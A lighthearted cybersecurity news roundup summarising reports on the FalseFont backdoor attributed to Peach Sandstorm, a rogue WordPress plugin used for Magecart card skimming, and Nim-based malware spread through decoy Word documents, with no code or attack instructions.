Happy Friday, cyber-sleuths! As we wrap up another week of digital drama, let's dive into a world where the only things more creative than the cybercriminals are the names of their malware. First up, we've got 'FalseFont,' a sneaky backdoor that's giving the defense sector more jitters than a double espresso. This custom-made cyber-nuisance, brought to you by the ever-so-busy Peach Sandstorm, is like the Swiss Army knife of malware, juggling data theft, remote access, and a side of espionage.

Switching gears to the e-commerce lane, watch out for that rogue WordPress plugin! It's not just adding items to your shopping cart; it's swiping credit card details faster than you can say "free shipping." This digital pickpocket, part of a Magecart campaign, makes stealing credit card info look as easy as a Black Friday sale.

And for our grand finale, behold the Nim-based malware masquerading as innocent Word documents. These aren't your average .docx files; they're gateways to a world of cyber chaos, proving that even the most mundane office tools can be a wolf in sheep's clothing.

Microsoft Raises Alarm Over 'FalseFont' Backdoor in Defense Sector

Beware, the defense sector! Microsoft has detected a new cybersecurity threat called 'FalseFont,' a backdoor deployed by an Iranian threat group, Peach Sandstorm (also known as APT33, Elfin, and Refined Kitten). This pernicious backdoor enables remote access to infected systems, file launches, and data transmission to command-and-control servers.

First seen in action in early November 2023, FalseFont is the latest weapon in Peach Sandstorm's arsenal, a group known for its password spray attacks targeting satellite, defense, and pharmaceutical industries globally since at least 2013.

Microsoft's revelation aligns with its September 2023 report, highlighting the group's persistent and evolving threat. This news comes amid the Israel National Cyber Directorate's (INCD) accusations against Iran and Hezbollah for attempted cyberattacks on Ziv Hospital and a separate phishing campaign using a fake security advisory as a decoy to spread wiper malware.

The scope of these attacks remains unclear, but one thing's certain: the cyber realm is a key battleground for modern defense and intelligence activities.

E-Commerce Under Siege: Rogue WordPress Plugin Exposes Credit Card Risks

Attention, e-commerce sites! A rogue WordPress plugin has emerged, posing a significant threat to online security. Discovered by Sucuri, this malicious plugin is part of a Magecart campaign, designed to infiltrate e-commerce websites by creating fake administrator accounts and injecting JavaScript code to steal credit card details.

Security expert Ben Martin warns that the plugin disguises itself as 'WordPress Cache Addons' to appear legitimate. Once installed, it replicates to the 'must-use plugins' directory, hiding from the admin panel and preventing manual removal by unregistering callback functions.

This fraudulent plugin can also stealthily create and hide admin user accounts, allowing threat actors prolonged access to e-commerce sites. Their ultimate goal? Injecting malware into checkout pages to skim credit card information and funnel it to their domains.

This discovery follows a recent phishing campaign that tricked users into installing a malicious plugin, posing as a security patch, which also created admin users and deployed a web shell for remote access.

Sucuri has noticed a troubling trend: cybercriminals using 'RESERVED' CVE identifiers to mask their activities. Additionally, Europol's recent spotlight report on online fraud emphasizes the rising threat of digital skimming, shifting from front-end to more elusive back-end malware.

Group-IB's collaboration with Europol in operation Digital Skimming Action reveals the detection of 23 JS-sniffer families, contributing to a total of 132 known JS-sniffer families compromising global websites by the end of 2023.

Moreover, a cryptocurrency drainer named MS Drainer, promoted through bogus Google Search and Twitter ads, has reportedly siphoned off $58.98 million from over 63,000 victims since March 2023, using more than 10,000 phishing sites.

Nim-Based Malware Disguised in Decoy Word Documents

A new phishing menace is on the rise, using decoy Microsoft Word documents to deliver a backdoor crafted in the Nim programming language. Security experts at Netskope, Ghanashyam Satpathy and Jan Michael Alcantara, highlight the challenges of tackling malware written in uncommon languages like Nim, citing the security community's unfamiliarity as a significant obstacle.

Nim's use in malware, such as NimzaLoader, Nimbda, IceXLoader, Dark Power, and Kanti, has been increasing. The phishing emails in this campaign appear to come from a Nepali government official, urging recipients to enable macros to activate the Nim malware. Once activated, the backdoor scans for analysis tools, self-terminating if detected, or otherwise establishing connections to a remote server for further instructions.

This campaign follows a recent disclosure by Cyble of a Python-based stealer malware called Editbot Stealer, spread through social media messages. Moreover, phishing campaigns have been distributing DarkGate and NetSupport RAT malware via email and compromised websites, with Proofpoint identifying 20 campaigns using DarkGate between September and November 2023.

Proofpoint also uncovered an attack sequence using two traffic delivery systems to exploit a Windows SmartScreen security bypass vulnerability, CVE-2023-36025, before Microsoft's official patch release, indicating its use as a zero-day exploit.

The evolving nature of cyber threats, including the use of various TDS tools and multiple social engineering techniques, underscores the sophistication and diversity of modern cyber attacks.